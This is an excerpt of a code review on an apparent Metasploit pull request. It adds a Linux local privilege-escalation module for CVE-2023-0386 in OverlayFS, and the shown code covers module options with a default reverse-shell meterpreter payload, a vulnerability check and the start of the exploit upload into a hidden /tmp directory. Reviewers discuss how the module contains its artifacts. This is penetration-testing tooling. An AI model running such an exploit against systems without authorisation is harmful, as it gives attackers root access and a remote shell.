modules/exploits/linux/local/cve_2023_0386_overlayfs_priv_esc.rb

```diff
@@ -0,0 +1,157 @@
+        'Arch' => [
+          ARCH_X64,
+        ],
+        'Targets' => [['Automatic', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'AppendExit' => true,
+          'PrependSetresuid' => true,
+          'PrependSetresgid' => true,
+          'PrependSetreuid' => true,
+          'PrependSetuid' => true,
+          'PrependFork' => true,
+          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+        },
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2023-0386' ],
+          [ 'URL', 'https://github.com/sxlmnwb/CVE-2023-0386' ],
+          [ 'URL', 'https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/overlayfs-cve-2023-0386' ],
+          [ 'URL', 'https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/' ],
+          [ 'URL', 'https://www.vicarius.io/vsociety/posts/cve-2023-0386-a-linux-kernel-bug-in-overlayfs' ],
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options([
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
+      OptInt.new('TIMEOUT', [ true, 'Timeout for exploit (seconds)', '60' ])
+    ])
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def check
+    unless kernel_arch.include?('x64')
+      return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
+    end
+
+    kernel_version = Rex::Version.new(kernel_release.split('-').first)
+    if kernel_version < Rex::Version.new('5.11') ||
+       Rex::Version.new('5.15.91') <= kernel_version && kernel_version < Rex::Version.new('5.16') ||
+       Rex::Version.new('6.1.9') <= kernel_version
+      return CheckCode::Safe("Linux kernel version #{kernel_version} is not vulnerable")
+    end
+
+    unless kernel_config && kernel_config.include?('CONFIG_USER_NS=y')
+      return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS=y')
+    end
+
+    vprint_good('Kernel config has CONFIG_USER_NS enabled')
+
+    unless userns_enabled?
+      return CheckCode::Safe('Unprivileged user namespaces are not permitted')
+    end
+
+    vprint_good('Unprivileged user namespaces are permitted')
+
+    CheckCode::Appears("Linux kernel version found: #{kernel_version}")
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def exploit
+    if !datastore['ForceExploit'] && is_root?
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
+    end
+
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    # Upload exploit executable
+    exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
```

Comment:
Why create a directory for the exploit, instead of simply putting it into `#{base_dir}`?

Reply:
While not strictly necessary, this code pattern was introduced in local exploit modules to keep all artifacts (such as temp files from compiling on-system) within one directory which can be deleted upon completion.

https://github.com/rapid7/metasploit-framework/pull/19441/files#diff-582239976447427dfe518f2db829db0f32f85069b220a831ef7c408b06957d34R153

Given this module performs a few `rm -rf` calls, I'd certainly feel safer keeping exploitation contained.

Reply:
Thank you!

> I'd certainly feel safer keeping exploitation contained.

I agree.